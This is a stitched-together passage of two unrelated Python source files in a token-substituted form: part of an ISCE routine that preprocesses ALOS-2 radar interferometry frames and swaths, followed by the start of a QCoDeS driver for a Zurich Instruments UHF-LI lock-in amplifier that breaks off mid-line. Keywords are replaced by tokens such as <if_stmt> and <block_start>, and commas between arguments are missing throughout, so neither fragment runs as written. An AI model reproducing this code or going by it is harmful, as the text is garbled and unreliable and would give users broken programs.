self._insar.numberRangeLooksSim=self.numberRangeLooksSim<line_sep>self._insar.numberAzimuthLooksSim=self.numberAzimuthLooksSim<line_sep>self._insar.numberRangeLooksIon=self.numberRangeLooksIon<line_sep>self._insar.numberAzimuthLooksIon=self.numberAzimuthLooksIon<if_stmt>self._insar.numberRangeLooks1<is><none><block_start>self._insar.numberRangeLooks1=modeProcParDict['ALOS-2'][referenceMode]['numberRangeLooks1']<block_end><if_stmt>self._insar.numberAzimuthLooks1<is><none><block_start>self._insar.numberAzimuthLooks1=modeProcParDict['ALOS-2'][referenceMode]['numberAzimuthLooks1']<block_end><if_stmt>self._insar.numberRangeLooks2<is><none><block_start>self._insar.numberRangeLooks2=modeProcParDict['ALOS-2'][referenceMode]['numberRangeLooks2']<block_end><if_stmt>self._insar.numberAzimuthLooks2<is><none><block_start>self._insar.numberAzimuthLooks2=modeProcParDict['ALOS-2'][referenceMode]['numberAzimuthLooks2']<block_end><if_stmt>self._insar.numberRangeLooksIon<is><none><block_start>self._insar.numberRangeLooksIon=modeProcParDict['ALOS-2'][referenceMode]['numberRangeLooksIon']<block_end><if_stmt>self._insar.numberAzimuthLooksIon<is><none><block_start>self._insar.numberAzimuthLooksIon=modeProcParDict['ALOS-2'][referenceMode]['numberAzimuthLooksIon']<block_end>#define processing file names self._insar.referenceDate=os.path.basename(ledFilesReference[0]).split('-')[2]<line_sep>self._insar.secondaryDate=os.path.basename(ledFilesSecondary[0]).split('-')[2]<line_sep>self._insar.setFilename(referenceDate=self._insar.referenceDate secondaryDate=self._insar.secondaryDate nrlks1=self._insar.numberRangeLooks1 nalks1=self._insar.numberAzimuthLooks1 nrlks2=self._insar.numberRangeLooks2 nalks2=self._insar.numberAzimuthLooks2)<line_sep>#find frame numbers <if_stmt>(self._insar.modeCombination<eq>31)<or>(self._insar.modeCombination<eq>32)<block_start><if_stmt>(self.referenceFrames<eq><none>)<or>(self.secondaryFrames<eq><none>)<block_start><raise>Exception('for ScanSAR-stripmap inteferometry, you must set reference and secondary frame numbers')<block_end><block_end>#if not set, find frames automatically <if_stmt>self.referenceFrames<eq><none><block_start>self.referenceFrames=[]<for_stmt>led ledFilesReference<block_start>frameNumber=os.path.basename(led).split('-')[1][-4:]<if_stmt>frameNumber<not><in>self.referenceFrames<block_start>self.referenceFrames.append(frameNumber)<block_end><block_end><block_end><if_stmt>self.secondaryFrames<eq><none><block_start>self.secondaryFrames=[]<for_stmt>led ledFilesSecondary<block_start>frameNumber=os.path.basename(led).split('-')[1][-4:]<if_stmt>frameNumber<not><in>self.secondaryFrames<block_start>self.secondaryFrames.append(frameNumber)<block_end><block_end><block_end>#sort frames self.referenceFrames=sorted(self.referenceFrames)<line_sep>self.secondaryFrames=sorted(self.secondaryFrames)<line_sep>#check number of frames <if_stmt>len(self.referenceFrames)<ne>len(self.secondaryFrames)<block_start><raise>Exception('number of frames in reference dir is not equal to number of frames \ in secondary dir. please set frame number manually')<block_end>#find swath numbers (if not ScanSAR-ScanSAR, compute valid swaths) <if_stmt>(self._insar.modeCombination<eq>0)<or>(self._insar.modeCombination<eq>1)<block_start>self.startingSwath=1<line_sep>self.endingSwath=1<block_end><if_stmt>self._insar.modeCombination<eq>21<block_start><if_stmt>self.startingSwath<eq><none><block_start>self.startingSwath=1<block_end><if_stmt>self.endingSwath<eq><none><block_start>self.endingSwath=5<block_end><block_end><if_stmt>self._insar.modeCombination<eq>22<block_start><if_stmt>self.startingSwath<eq><none><block_start>self.startingSwath=1<block_end><if_stmt>self.endingSwath<eq><none><block_start>self.endingSwath=7<block_end><block_end>#determine starting and ending swaths for ScanSAR-stripmap, user's settings are overwritten #use first frame to check overlap <if_stmt>(self._insar.modeCombination<eq>31)<or>(self._insar.modeCombination<eq>32)<block_start><if_stmt>self._insar.modeCombination<eq>31<block_start>numberOfSwaths=5<block_end><else_stmt><block_start>numberOfSwaths=7<block_end>overlapSubswaths=[]<for_stmt>i range(numberOfSwaths)<block_start>overlapRatio=check_overlap(ledFilesReference[0] firstFrameImagesReference[i] ledFilesSecondary[0] firstFrameImagesSecondary[0])<if_stmt>overlapRatio<g>1.0/4.0<block_start>overlapSubswaths.append(i+1)<block_end><block_end><if_stmt>overlapSubswaths<eq>[]<block_start><raise>Exception('There is no overlap area between the ScanSAR-stripmap pair')<block_end>self.startingSwath=int(overlapSubswaths[0])<line_sep>self.endingSwath=int(overlapSubswaths[-1])<block_end>#save the valid frames and swaths for future processing self._insar.referenceFrames=self.referenceFrames<line_sep>self._insar.secondaryFrames=self.secondaryFrames<line_sep>self._insar.startingSwath=self.startingSwath<line_sep>self._insar.endingSwath=self.endingSwath<line_sep>################################################## #1. create directories and read data ################################################## self.reference.configure()<line_sep>self.secondary.configure()<line_sep>self.reference.track.configure()<line_sep>self.secondary.track.configure()<for_stmt>i,(referenceFrame secondaryFrame) enumerate(zip(self._insar.referenceFrames self._insar.secondaryFrames))#frame number starts with 1 <block_start>frameDir='f{}_{}'.format(i+1 referenceFrame)<line_sep>os.makedirs(frameDir exist_ok=<true>)<line_sep>os.chdir(frameDir)<line_sep>#attach a frame to reference and secondary frameObjReference=MultiMode.createFrame()<line_sep>frameObjSecondary=MultiMode.createFrame()<line_sep>frameObjReference.configure()<line_sep>frameObjSecondary.configure()<line_sep>self.reference.track.frames.append(frameObjReference)<line_sep>self.secondary.track.frames.append(frameObjSecondary)<line_sep>#swath number starts with 1 <for_stmt>j range(self._insar.startingSwath self._insar.endingSwath+1)<block_start>print('processing frame {} swath {}'.format(referenceFrame j))<line_sep>swathDir='s{}'.format(j)<line_sep>os.makedirs(swathDir exist_ok=<true>)<line_sep>os.chdir(swathDir)<line_sep>#attach a swath to reference and secondary swathObjReference=MultiMode.createSwath()<line_sep>swathObjSecondary=MultiMode.createSwath()<line_sep>swathObjReference.configure()<line_sep>swathObjSecondary.configure()<line_sep>self.reference.track.frames[-1].swaths.append(swathObjReference)<line_sep>self.secondary.track.frames[-1].swaths.append(swathObjSecondary)<line_sep>#setup reference self.reference.leaderFile=sorted(glob.glob(os.path.join(self.referenceDir 'LED-ALOS2*{}-*-*'.format(referenceFrame))))[0]<if_stmt>referenceMode<in>scansarModes<block_start>self.reference.imageFile=sorted(glob.glob(os.path.join(self.referenceDir 'IMG-{}-ALOS2*{}-*-*-F{}'.format(self.referencePolarization.upper() referenceFrame j))))[0]<block_end><else_stmt><block_start>self.reference.imageFile=sorted(glob.glob(os.path.join(self.referenceDir 'IMG-{}-ALOS2*{}-*-*'.format(self.referencePolarization.upper() referenceFrame))))[0]<block_end>self.reference.outputFile=self._insar.referenceSlc<line_sep>self.reference.useVirtualFile=self.useVirtualFile<line_sep>#read reference (imageFDR imageData)=self.reference.readImage()<line_sep>(leaderFDR sceneHeaderRecord platformPositionRecord facilityRecord)=self.reference.readLeader()<line_sep>self.reference.setSwath(leaderFDR sceneHeaderRecord platformPositionRecord facilityRecord imageFDR imageData)<line_sep>self.reference.setFrame(leaderFDR sceneHeaderRecord platformPositionRecord facilityRecord imageFDR imageData)<line_sep>self.reference.setTrack(leaderFDR sceneHeaderRecord platformPositionRecord facilityRecord imageFDR imageData)<line_sep>#setup secondary self.secondary.leaderFile=sorted(glob.glob(os.path.join(self.secondaryDir 'LED-ALOS2*{}-*-*'.format(secondaryFrame))))[0]<if_stmt>secondaryMode<in>scansarModes<block_start>self.secondary.imageFile=sorted(glob.glob(os.path.join(self.secondaryDir 'IMG-{}-ALOS2*{}-*-*-F{}'.format(self.secondaryPolarization.upper() secondaryFrame j))))[0]<block_end><else_stmt><block_start>self.secondary.imageFile=sorted(glob.glob(os.path.join(self.secondaryDir 'IMG-{}-ALOS2*{}-*-*'.format(self.secondaryPolarization.upper() secondaryFrame))))[0]<block_end>self.secondary.outputFile=self._insar.secondarySlc<line_sep>self.secondary.useVirtualFile=self.useVirtualFile<line_sep>#read secondary (imageFDR imageData)=self.secondary.readImage()<line_sep>(leaderFDR sceneHeaderRecord platformPositionRecord facilityRecord)=self.secondary.readLeader()<line_sep>self.secondary.setSwath(leaderFDR sceneHeaderRecord platformPositionRecord facilityRecord imageFDR imageData)<line_sep>self.secondary.setFrame(leaderFDR sceneHeaderRecord platformPositionRecord facilityRecord imageFDR imageData)<line_sep>self.secondary.setTrack(leaderFDR sceneHeaderRecord platformPositionRecord facilityRecord imageFDR imageData)<line_sep>os.chdir('../')<block_end>self._insar.saveProduct(self.reference.track.frames[-1] self._insar.referenceFrameParameter)<line_sep>self._insar.saveProduct(self.secondary.track.frames[-1] self._insar.secondaryFrameParameter)<line_sep>os.chdir('../')<block_end>self._insar.saveProduct(self.reference.track self._insar.referenceTrackParameter)<line_sep>self._insar.saveProduct(self.secondary.track self._insar.secondaryTrackParameter)<line_sep>catalog.printToLog(logger "runPreprocessor")<line_sep>self._insar.procDoc.addAllFromCatalog(catalog)<block_end><def_stmt>check_overlap ldr_m img_m ldr_s img_s<block_start><import_from_stmt>isceobj.Constants SPEED_OF_LIGHT<line_sep>rangeSamplingRateReference,widthReference,nearRangeReference=read_param_for_checking_overlap(ldr_m img_m)<line_sep>rangeSamplingRateSecondary,widthSecondary,nearRangeSecondary=read_param_for_checking_overlap(ldr_s img_s)<line_sep>farRangeReference=nearRangeReference+(widthReference-1)<times>0.5<times>SPEED_OF_LIGHT/rangeSamplingRateReference<line_sep>farRangeSecondary=nearRangeSecondary+(widthSecondary-1)<times>0.5<times>SPEED_OF_LIGHT/rangeSamplingRateSecondary<line_sep>#This should be good enough, although precise image offsets are not used. <if_stmt>farRangeReference<le>nearRangeSecondary<block_start>overlapRatio=0.0<block_end><elif_stmt>farRangeSecondary<le>nearRangeReference<block_start>overlapRatio=0.0<block_end><else_stmt># 0 1 2 3 <block_start>ranges=np.array([nearRangeReference farRangeReference nearRangeSecondary farRangeSecondary])<line_sep>rangesIndex=np.argsort(ranges)<line_sep>overlapRatio=ranges[rangesIndex[2]]-ranges[rangesIndex[1]]/(farRangeReference-nearRangeReference)<block_end><return>overlapRatio<block_end><def_stmt>read_param_for_checking_overlap leader_file image_file<block_start><import_from_stmt>isceobj.Sensor xmlPrefix<import_stmt>isceobj.Sensor.CEOS<as>CEOS<line_sep>#read from leader file fsampConst={104:1.047915957140240E+08 52:5.239579785701190E+07 34:3.493053190467460E+07 17:1.746526595233730E+07}<line_sep>fp=open(leader_file 'rb')<line_sep>leaderFDR=CEOS.CEOSDB(xml=os.path.join(xmlPrefix 'alos2_slc/leader_file.xml') dataFile=fp)<line_sep>leaderFDR.parse()<line_sep>fp.seek(leaderFDR.getEndOfRecordPosition())<line_sep>sceneHeaderRecord=CEOS.CEOSDB(xml=os.path.join(xmlPrefix 'alos2_slc/scene_record.xml') dataFile=fp)<line_sep>sceneHeaderRecord.parse()<line_sep>fp.seek(sceneHeaderRecord.getEndOfRecordPosition())<line_sep>fsamplookup=int(sceneHeaderRecord.metadata['Range sampling rate in MHz'])<line_sep>rangeSamplingRate=fsampConst[fsamplookup]<line_sep>fp.close()<line_sep>#print('{}'.format(rangeSamplingRate)) #read from image file fp=open(image_file 'rb')<line_sep>imageFDR=CEOS.CEOSDB(xml=os.path.join(xmlPrefix 'alos2_slc/image_file.xml') dataFile=fp)<line_sep>imageFDR.parse()<line_sep>fp.seek(imageFDR.getEndOfRecordPosition())<line_sep>imageData=CEOS.CEOSDB(xml=os.path.join(xmlPrefix 'alos2_slc/image_record.xml') dataFile=fp)<line_sep>imageData.parseFast()<line_sep>width=imageFDR.metadata['Number of pixels per line per SAR channel']<line_sep>near_range=imageData.metadata['Slant range to 1st data sample']<line_sep>fp.close()<line_sep>#print('{}'.format(width)) #print('{}'.format(near_range)) <return>(rangeSamplingRate width near_range)<block_end>
<import_stmt>logging<import_stmt>math<import_stmt>time<import_from_stmt>functools partial<import_from_stmt>math sqrt<import_from_stmt>typing Any Callable Dict List Optional Sequence Union cast<import_stmt>numpy<as>np<import_from_stmt>qcodes.utils.helpers create_on_off_val_mapping<try_stmt><block_start><import_stmt>zhinst.utils<block_end><except_stmt>ImportError<block_start><raise>ImportError('''Could not find Zurich Instruments Lab One software. Please refer to the Zi UHF-LI User Manual for download and installation instructions. ''')<block_end><import_from_stmt>qcodes.instrument.base Instrument<import_from_stmt>qcodes.instrument.channel ChannelList InstrumentChannel<import_from_stmt>qcodes.instrument.parameter MultiParameter<import_from_stmt>qcodes.utils validators<as>vals<import_from_stmt>qcodes.utils.deprecate deprecate<line_sep>log=logging.getLogger(__name__)<class_stmt>AUXOutputChannel(InstrumentChannel)<block_start><def_stmt>__init__ self parent:'ZIUHFLI' name:str channum:int<arrow><none><block_start>super().__init__(parent name)<line_sep># TODO better validations of parameters self.add_parameter('scale' label='scale' unit='' get_cmd=partial(self._parent._getter 'auxouts' channum-1 1 'scale') set_cmd=partial(self._parent._setter 'auxouts' channum-1 1 'scale') vals=vals.Numbers())<line_sep>self.add_parameter('preoffset' label='preoffset' unit='' get_cmd=partial(self._parent._getter 'auxouts' channum-1 1 'preoffset') set_cmd=partial(self._parent._setter 'auxouts' channum-1 1 'preoffset') vals=vals.Numbers())<line_sep>self.add_parameter('offset' label='offset' unit='' get_cmd=partial(self._parent._getter 'auxouts' channum-1 1 'offset') set_cmd=partial(self._parent._setter 'auxouts' channum-1 1 'offset') vals=vals.Numbers())<line_sep>self.add_parameter('limitlower' label='Lower limit' unit='' get_cmd=partial(self._parent._getter 'auxouts' channum-1 1 'limitlower') set_cmd=partial(self._parent._setter 'auxouts' channum-1 1 'limitlower') vals=vals.Numbers())<line_sep>self.add_parameter('limitupper' label='Upper limit' unit='' get_cmd=partial(self._parent._getter 'auxouts' channum-1 1 'limitupper') set_cmd=partial(self._parent._setter 'auxouts' channum-1 1 'limitupper') vals=vals.Numbers())<line_sep># TODO the validator does not catch that there are only # 2 valid output channels for AU types self.add_parameter('channel' label='Channel' unit='' get_cmd=partial(self._parent._getter 'auxouts' channum-1 0 'demodselect') set_cmd=partial(self._parent._setter 'auxouts' channum-1 0 'demodselect') get_parser=<lambda>x:x+1 set_parser=<lambda>x:x-1 vals=vals.Ints(0 7))<line_sep>outputvalmapping={'Demod X':0 'Demod Y':1 'Demod R':2 'Demod THETA':3 'AU Cartesian':7 'AU Polar':8}<line_sep>self.add_parameter('output' label='Output' unit='' get_cmd=partial(self._parent._getter 'auxouts' channum-1 0 'outputselect') set_cmd=partial(self._parent._setter 'auxouts' channum-1 0 'outputselect') val_mapping=outputvalmapping)<block_end><block_end><class_stmt>Sweep(MultiParameter)<block_start>""" Parameter class for the ZIUHFLI instrument class for the sweeper. The get method returns a tuple of arrays, where each array contains the values of a signal added to the sweep (e.g. demodulator 4 phase). Attributes: names (tuple): Tuple of strings containing the names of the sweep signals (to be measured) units (tuple): Tuple of strings containg the units of the signals shapes (tuple): Tuple of tuples each containing the Length of a signal. setpoints (tuple): Tuple of N copies of the sweep x-axis points, where N is he number of measured signals setpoint_names (tuple): Tuple of N identical strings with the name of the sweep x-axis. """<def_stmt>__init__ self name instrument **kwargs# The __init__ requires that we supply names and shapes, # but there is no way to know what they could be known at this time. # They are updated via build_sweep. <block_start>super().__init__(name names=("" ) shapes=((1 ) ) instrument=instrument **kwargs)<block_end><def_stmt>build_sweep self<block_start>""" Build a sweep with the current sweep settings. Must be called before the sweep can be executed. For developers: This is a general function for updating the sweeper. Every time a parameter of the sweeper is changed, this function must be called to update the sweeper. Although such behaviour is only strictly necessary for parameters that affect the setpoints of the Sweep parameter, having to call this function for any parameter is deemed more user friendly (easier to remember; when? -always). The function sets all (user specified) settings on the sweeper and additionally sets names, units, and setpoints for the Sweep parameter. """<line_sep>signals=self.instrument._sweeper_signals<line_sep>sweepdict=self.instrument._sweepdict<line_sep>log.info('Built a sweep')<line_sep>sigunits={'X':'V' 'Y':'V' 'R':'Vrms' 'Xrms':'Vrms' 'Yrms':'Vrms' 'Rrms':'Vrms' 'phase':'degrees'}<line_sep>names=[]<line_sep>units=[]<for_stmt>sig signals<block_start>name=sig.split('/')[-1]<line_sep>names.append(name)<line_sep>units.append(sigunits[name])<block_end>self.names=tuple(names)<line_sep>self.units=tuple(units)<line_sep>self.labels=tuple(names)# TODO: What are good labels? # TODO: what are good set point names? spnamedict={'auxouts/0/offset':'Volts' 'auxouts/1/offset':'Volts' 'auxouts/2/offset':'Volts' 'auxouts/3/offset':'Volts' 'demods/0/phaseshift':'degrees' 'demods/1/phaseshift':'degrees' 'demods/2/phaseshift':'degrees' 'demods/3/phaseshift':'degrees' 'demods/4/phaseshift':'degrees' 'demods/5/phaseshift':'degrees' 'demods/6/phaseshift':'degrees' 'demods/7/phaseshift':'degrees' 'oscs/0/freq':'Hz' 'oscs/1/freq':'Hz' 'sigouts/0/amplitudes/3':'Volts' 'sigouts/0/offset':'Volts' 'sigouts/1/amplitudes/7':'Volts' 'sigouts/1/offset':'Volts'}<line_sep>sp_name=spnamedict[sweepdict['gridnode']]<line_sep>self.setpoint_names=((sp_name ) )<times>len(signals)<line_sep>start=sweepdict['start']<line_sep>stop=sweepdict['stop']<line_sep>npts=sweepdict['samplecount']<line_sep># TODO: make sure that these setpoints are correct, i.e. actually # matching what the UHFLI does # TODO: support non-sequential sweep mode <if_stmt><not>sweepdict['scan']<eq>0<block_start><raise>NotImplementedError('Only sequential scanning is supported.')<block_end><if_stmt>sweepdict['xmapping']<eq>0<block_start>sw=tuple(np.linspace(start stop npts))<block_end><else_stmt><block_start>logstart=np.log10(start)<line_sep>logstop=np.log10(stop)<line_sep>sw=tuple(np.logspace(logstart logstop npts))<block_end>self.setpoints=((sw ) )<times>len(signals)<line_sep>self.shapes=((npts ) )<times>len(signals)<line_sep># Now actually send the settings to the instrument <for_stmt>(setting value) sweepdict.items()<block_start>setting='sweep/'+setting<line_sep>self.instrument.sweeper.set(setting value)<block_end>self.instrument.sweep_correctly_built=<true><block_end><def_stmt>get_raw self<block_start>""" Execute the sweeper and return the data corresponding to the subscribed signals. Returns: tuple: Tuple containg N numpy arrays where N is the number of signals added to the sweep. Raises: ValueError: If no signals have been added to the sweep ValueError: If a sweep setting has been modified since the last sweep, but Sweep.build_sweep has not been run """<line_sep>daq=self.instrument.daq<line_sep>signals=self.instrument._sweeper_signals<line_sep>sweeper=self.instrument.sweeper<if_stmt>signals<eq>[]<block_start><raise>ValueError('No signals selected! Can not perform sweep.')<block_end><if_stmt>self.instrument.sweep_correctly_built<is><false><block_start><raise>ValueError('The sweep has not been correctly built.'+' Please run Sweep.build_sweep.')<block_end># We must enable the demodulators we use. # After the sweep, they should be returned to their original state streamsettings=[]# This list keeps track of the pre-sweep settings <for_stmt>sigstr signals<block_start>path='/'.join(sigstr.split('/')[:-1])<line_sep>(_ dev _ dmnum _)=path.split('/')<line_sep># If the setting has never changed, get returns an empty dict. # In that case, we assume that it's zero (factory default) <try_stmt><block_start>toget=path.replace('sample' 'enable')<line_sep># ZI like nesting inside dicts... setting=daq.get(toget)[dev]['demods'][dmnum]['enable']['value'][0]<block_end><except_stmt>KeyError<block_start>setting=0<block_end>streamsettings.append(setting)<line_sep>daq.setInt(path.replace('sample' 'enable') 1)<line_sep># We potentially subscribe several times to the same demodulator, # but that should not be a problem sweeper.subscribe(path)<block_end>sweeper.execute()<line_sep>timeout=self.instrument.sweeper_timeout.get()<line_sep>start=time.time()<while_stmt><not>sweeper.finished()# Wait until the sweep is done/timeout <block_start>time.sleep(0.2)# Check every 200 ms whether the sweep is done # Here we could read intermediate data via: # data = sweeper.read(True)... # and process it while the sweep is completing. <if_stmt>(time.time()-start)<g>timeout# If for some reason the sweep is blocking, force the end of the # measurement. <block_start>log.error("Sweep still not finished, forcing finish...")<line_sep># should exit function with error message instead of returning sweeper.finish()<block_end><block_end>return_flat_dict=<true><line_sep>data=sweeper.read(return_flat_dict)<line_sep>sweeper.unsubscribe('*')<for_stmt>(state sigstr) zip(streamsettings signals)<block_start>path='/'.join(sigstr.split('/')[:-1])<line_sep>daq.setInt(path.replace('sample' 'enable') int(state))<block_end><return>self._parsesweepdata(data)<block_end><def_stmt>_parsesweepdata self sweepresult<block_start>""" Parse the raw result of a sweep into just the data asked for by the added sweeper signals. Used by Sweep.get. Args: sweepresult (dict): The dict returned by sweeper.read Returns: tuple: The requested signals in a tuple """<line_sep>trans={'X':'x' 'Y':'y' 'Aux Input 1':'auxin0' 'Aux Input 2':'auxin1' 'R':'r' 'phase':'phase' 'Xrms':'xpwr' 'Yrms':'ypwr' 'Rrms':'rpwr'}<line_sep>returndata=[]<for_stmt>signal self.instrument._sweeper_signals<block_start>path='/'.join(signal.split('/')[:-1])<line_sep>attr=signal.split('/')[-1]<line_sep>data=sweepresult[path][0][0][trans[attr]]<line_sep>returndata.append(data)<block_end><return>tuple(returndata)<block_end><block_end><class_stmt>Scope(MultiParameter)<block_start>""" Parameter class for the ZI UHF-LI Scope Channel 1 The .get method launches an acquisition and returns a tuple of two np.arrays FFT mode is NOT supported. Attributes: names (tuple): Tuple of strings containing the names of the sweep signals (to be measured) units (tuple): Tuple of strings containg the units of the signals shapes (tuple): Tuple of tuples each containing the Length of a signal. setpoints (tuple): Tuple of N copies of the sweep x-axis points, where N is he number of measured signals setpoint_names (tuple): Tuple of N identical strings with the name of the sweep x-axis. """<def_stmt>__init__ self name instrument **kwargs# The __init__ requires that we supply names and shapes, # but there is no way to know what they could be known at this time. # They are updated via build_scope. <block_start>super().__init__(name names=("" ) shapes=((1 ) ) instrument=instrument **kwargs)<line_sep>self._scopeactions=[]<block_end># list of callables <def_stmt>add_post_trigger_action self action:Callable[<ellipsis> Any]<arrow><none><block_start>""" Add an action to be performed immediately after the trigger has been armed. The action must be a callable taking zero arguments """<if_stmt>action<not><in>self._scopeactions<block_start>self._scopeactions.append(action)<block_end><block_end>@property<def_stmt>post_trigger_actions self<arrow>List[Callable[<ellipsis> Any]]<block_start><return>self._scopeactions<block_end><def_stmt>prepare_scope self<block_start>""" Prepare the scope for a measurement. Must immediately preceed a measurement. """<line_sep>log.info('Preparing the scope')<line_sep># A convenient reference params=self.instrument.parameters<line_sep># First figure out what the user has asked for chans={1:(<true> <false>) 2:(<false> <true>) 3:(<true> <true>)}<line_sep>channels=chans[params['scope_channels'].get()]<line_sep>npts=params['scope_length'].get()<line_sep># Find out whether segments are enabled <if_stmt>params['scope_segments'].get()<eq>'ON'<block_start>segs=params['scope_segments_count'].get()<block_end><else_stmt><block_start>segs=1<block_end>inputunits={'Signal Input 1':'V' 'Signal Input 2':'V' 'Trig Input 1':'V' 'Trig Input 2':'V' 'Aux Output 1':'V' 'Aux Output 2':'V' 'Aux Output 3':'V' 'Aux Output 4':'V' 'Aux In 1 Ch 1':'V' 'Aux In 1 Ch 2':'V' 'Osc phi Demod 4':'°' 'osc phi Demod 8':'°' 'AU Cartesian 1':'arb. un.' 'AU Cartesian 2':'arb. un' 'AU Polar 1':'arb. un.' 'AU Polar 2':'arb. un.' 'Demod 1 X':'V' 'Demod 1 Y':'V' 'Demod 1 R':'V' 'Demod 1 Phase':'°' 'Demod 2 X':'V' 'Demod 2 Y':'V' 'Demod 2 R':'V' 'Demod 2 Phase':'°' 'Demod 3 X':'V' 'Demod 3 Y':'V' 'Demod 3 R':'V' 'Demod 3 Phase':'°' 'Demod 4 X':'V' 'Demod 4 Y':'V' 'Demod 4 R':'V' 'Demod 4 Phase':'°' 'Demod 5 X':'V' 'Demod 5 Y':'V' 'Demod 5 R':'V' 'Demod 5 Phase':'°' 'Demod 6 X':'V' 'Demod 6 Y':'V' 'Demod 6 R':'V' 'Demod 6 Phase':'°' 'Demod 7 X':'V' 'Demod 7 Y':'V' 'Demod 7 R':'V' 'Demod 7 Phase':'°' 'Demod 8 X':'V' 'Demod 8 Y':'V' 'Demod 8 R':'V' 'Demod 8 Phase':'°' }<line_sep>#TODO: what are good names? inputnames={'Signal Input 1':'Sig. In 1' 'Signal Input 2':'Sig. In 2' 'Trig Input 1':'Trig. In 1' 'Trig Input 2':'Trig. In 2' 'Aux Output 1':'Aux. Out 1' 'Aux Output 2':'Aux. Out 2' 'Aux Output 3':'Aux. Out 3' 'Aux Output 4':'Aux. Out 4' 'Aux In 1 Ch 1':'Aux. In 1 Ch 1' 'Aux In 1 Ch 2':'Aux. In 1 Ch 2' 'Osc phi Demod 4':'Demod. 4 Phase' 'osc phi Demod 8':'Demod. 8 Phase' 'AU Cartesian 1':'AU Cartesian 1' 'AU Cartesian 2':'AU Cartesian 2' 'AU Polar 1':'AU Polar 1' 'AU Polar 2':'AU Polar 2' 'Demod 1 X':'Demodulator 1 X' 'Demod 1 Y':'Demodulator 1 Y' 'Demod 1 R':'Demodulator 1 R' 'Demod 1 Phase':'Demodulator 1 Phase' 'Demod 2 X':'Demodulator 2 X' 'Demod 2 Y':'Demodulator 2 Y' 'Demod 2 R':'Demodulator 2 R' 'Demod 2 Phase':'Demodulator 2 Phase' 'Demod 3 X':'Demodulator 3 X' 'Demod 3 Y':'Demodulator 3 Y' 'Demod 3 R':'Demodulator 3 R' 'Demod 3 Phase':'Demodulator 3 Phase' 'Demod 4 X':'Demodulator 4 X' 'Demod 4 Y':'Demodulator 4 Y' 'Demod 4 R':'Demodulator 4 R' 'Demod 4 Phase':'Demodulator 4 Phase' 'Demod 5 X':'Demodulator 5 X' 'Demod 5 Y':'Demodulator 5 Y' 'Demod 5 R':'Demodulator 5 R' 'Demod 5 Phase':'Demodulator 5 Phase' 'Demod 6 X':'Demodulator 6 X' 'Demod 6 Y':'Demodulator 6 Y' 'Demod 6 R':'Demodulator 6 R' 'Demod 6 Phase':'Demodulator 6 Phase' 'Demod 7 X':'Demodulator 7 X' 'Demod 7 Y':'Demodulator 7 Y' 'Demod 7 R':'Demodulator 7 R' 'Demod 7 Phase':'Demodulator 7 Phase' 'Demod 8 X':'Demodulator 8 X' 'Demod 8 Y':'Demodulator 8 Y' 'Demod 8 R':'Demodulator 8 R' 'Demod 8 Phase':'Demodulator 8 Phase' }<line_sep># Make the basic setpoints (the x-axis) duration=params['scope_duration'].get()<line_sep>delay=params['scope_trig_delay'].get()<line_sep>starttime=params['scope_trig_reference'].get()<times>0.01<times>duration+delay<line_sep>stoptime=starttime+duration<line_sep>setpointlist=tuple(np.linspace(starttime stoptime npts))# x-axis spname='Time'<line_sep>namestr=f"scope_channel{1}_input"<line_sep>name1=inputnames[params[namestr].get()]<line_sep>unit1=inputunits[params[namestr].get()]<line_sep>namestr=f"scope_channel{2}_input"<line_sep>name2=inputnames[params[namestr].get()]<line_sep>unit2=inputunits[params[namestr].get()]<line_sep>self.setpoints=((tuple(range(segs)) (setpointlist )<times>segs) )<times>2<line_sep>#self.setpoints = ((setpointlist,)*segs,)*2 self.setpoint_names=(('Segments' 'Time') ('Segments' 'Time'))<line_sep>self.names=(name1 name2)<line_sep>self.units=(unit1 unit2)<line_sep>self.labels=('Scope channel 1' 'Scope channel 2')<line_sep>self.shapes=((segs npts) (segs npts))<line_sep>self.instrument.daq.sync()<line_sep>self.instrument.scope_correctly_built=<true><block_end><def_stmt>get_raw self<block_start>""" Acquire data from the scope. Returns: tuple: Tuple of two n X m arrays where n is the number of segments and m is the number of points in the scope trace. Raises: ValueError: If the scope has not been prepared by running the prepare_scope function. """<line_sep>t_start=time.monotonic()<line_sep>log.info('Scope get method called')<if_stmt><not>self.instrument.scope_correctly_built<block_start><raise>ValueError('Scope not properly prepared. Please run '<concat>'prepare_scope before measuring.')<block_end># A convenient reference params=self.instrument.parameters<line_sep># chans={1:(<true> <false>) 2:(<false> <true>) 3:(<true> <true>)}<line_sep>channels=chans[params['scope_channels'].get()]<if_stmt>params['scope_trig_holdoffmode'].get_latest()<eq>'events'<block_start><raise>NotImplementedError('Scope trigger holdoff in number of '<concat>'events not supported. Please specify '<concat>'holdoff in seconds.')<block_end>####################################################### # The following steps SEEM to give the correct result # Make sure all settings have taken effect self.instrument.daq.sync()<line_sep># Calculate the time needed for the measurement. We often have failed # measurements, so a timeout is needed. <if_stmt>params['scope_segments'].get()<eq>'ON'<block_start>segs=params['scope_segments_count'].get()<block_end><else_stmt><block_start>segs=1<block_end>deadtime=params['scope_trig_holdoffseconds'].get_latest()<line_sep># We add one second to account for latencies and random delays meas_time=segs<times>(params['scope_duration'].get()+deadtime)+1<line_sep>npts=params['scope_length'].get()<line_sep>zi_error=<true><line_sep>error_counter=0<line_sep>num_retries=10<line_sep>timedout=<false><while_stmt>(zi_error<or>timedout)<and>error_counter<l>num_retries# one shot per trigger. This needs to be set every time # a the scope is enabled as below using scope_runstop <block_start><try_stmt># we wrap this in try finally to ensure that # scope.finish is always called even if the # measurement is interrupted <block_start>self.instrument.daq.setInt(f"/{self.instrument.device}/scopes/0/single" 1)<line_sep>scope=self.instrument.scope<line_sep>scope.set('scopeModule/clearhistory' 1)<line_sep># Start the scope triggering/acquiring # set /dev/scopes/0/enable to 1 params['scope_runstop'].set('run')<line_sep>self.instrument.daq.sync()<line_sep>log.debug('Starting ZI scope acquisition.')<line_sep># Start something... hauling data from the scopeModule? scope.execute()<line_sep># Now perform actions that may produce data, e.g. running an AWG <for_stmt>action self._scopeactions<block_start>action()<block_end>starttime=time.time()<line_sep>timedout=<false><line_sep>progress=scope.progress()<while_stmt>progress<l>1<block_start>log.debug(f'Scope progress is {progress}')<line_sep>progress=scope.progress()<line_sep>time.sleep(0.1)# This while+sleep is how ZI engineers do it <if_stmt>(time.time()-starttime)<g>20<times>meas_time+1<block_start>timedout=<true><line_sep><break><block_end><block_end>metadata=scope.get("scopeModule/*")<line_sep>zi_error=bool(metadata['error'][0])<line_sep># Stop the scope from running params['scope_runstop'].set('stop')<if_stmt><not>(timedout<or>zi_error)<block_start>log.info('[+] ZI scope acquisition completed 